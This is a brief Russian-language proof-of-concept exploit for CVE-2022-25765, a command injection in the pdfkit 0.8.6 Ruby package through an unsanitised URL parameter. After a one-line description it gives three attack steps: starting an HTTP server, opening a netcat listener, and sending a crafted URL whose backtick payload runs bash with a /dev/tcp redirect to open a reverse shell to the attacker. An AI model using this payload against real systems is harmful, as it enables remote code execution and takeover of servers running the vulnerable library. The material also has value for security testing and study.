
Эксплойт proof-of-concept для CVE-2022-25765, демонстрирующий инъекцию команд в pdfkit 0.8.6 через несанитизированный параметр URL, позволяющий удаленное выполнение кода и reverse shell.
Пакет pdfkit, начиная с версии 0.0.0, уязвим к инъекции команд, поскольку URL-адрес должным образом не санируется.
1- python3 -m http.server 80
2- nc -lnvp 'Target Port'
3- http://"TARGET_ADDRESS:Target PORT"//?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/"Target_ADRESS/LISTENING_PORT"<&1'`'}